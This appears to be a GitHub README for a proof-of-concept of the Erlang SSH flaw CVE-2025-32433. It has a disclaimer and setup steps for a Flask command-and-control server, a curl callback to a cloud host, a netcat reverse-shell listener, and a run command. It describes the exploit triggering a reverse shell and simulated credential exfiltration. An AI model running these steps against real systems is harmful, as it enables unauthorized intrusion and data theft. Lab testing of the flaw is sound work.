POC_CVE-2025-32433

## ⚠️ Ethical Disclaimer This repository contains code that demonstrates a real CVE (CVE-2025-32433). Use it **only in environments where you have explicit authorization**. Never test this exploit against systems you do not own or manage. Unauthorized use is illegal, unethical, and harmful to the cybersecurity community. simulated and real POC FOR CVE-2025-32433 My homie Chocapikk showed me this found poc erling_cve.py i was intruged and wanted to test it in a safe enviorment. you have two choices with this repo. the safe simulated script and system i lay out below. or you can utilize the real deal erling_cve.py (in an ethical way with caution and only on networks you have permission to test) before using this tool to test or run an actual exploit check out my homie m0usemm0use and his python script to find vulnerable targets of CVE-2025-32433!!!! https://github.com/m0usem0use/erl_mouse ------------------------------------------------------ SIMULATED version of exploit for cve-2025-32433 Set Up the C2 Server build a Python Flask-based C2 : powerful for bot callbacks or reverse shells. Run this setup script on the C2 server apt update && apt install python3-pip git -y sudo apt install python3-flask mkdir ~/c2 cd ~/c2 nano c2_server.py (paste in c2_server script edit as needed) run python3 c2_server.py bots (or test scripts) can curl home like this curl -X POST http://<linode-ip>:8080/report -d "Bot is online" Set Up Python venv on Kali mkdir ~/ssh-bot-lab && cd ~/ssh-bot-lab Create a Python virtual environment python3 -m venv venv source venv/bin/activate sudo apt install python3-requests Test the Callback nano test_callback.py (paste in test_callback script and edit as needed) run callback python3 test_callback.py You now officially have A working venv A live cloud C2 Functional callback injection -You need the target/victim machine to have an Erlang process or service exposed (or simulated) ----------------------------------------------------------------------- WHAT DOES Eerling_cve.py do? Connects to port 22 of a target IP Sends a fake SSH version string Sends a crafted packet (likely to trigger a vuln — pretending to abuse something like Erlang’s undocumented SSH handler or buffer overflow) Triggers a reverse shell back to the attacker IP Simulates post-exploitation by running commands like whoami, uname, and fake "credential exfil" to /tmp/exfil.log We’ll take our found Erlang-ish PoC and Make it functional inside Kali venv Wire it to report to our cloud C2 when the "attack" runs Run it ethically and safely within a controlled lab Watch it generate /tmp/exfil.log to simulate stolen data ------------------------- from the kali machine nano poc_erlang_test.py -paste in poc_erlang_test.py and edit as needed Open a Listener in a new terminal run nc -lvnp 4444 run poc python poc_erlang_test.py --real

MIT License Copyright (c) 2026 ek0mssavi0r Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. USE AT YOUR OWN RISK. NO WARRANTY PROVIDED.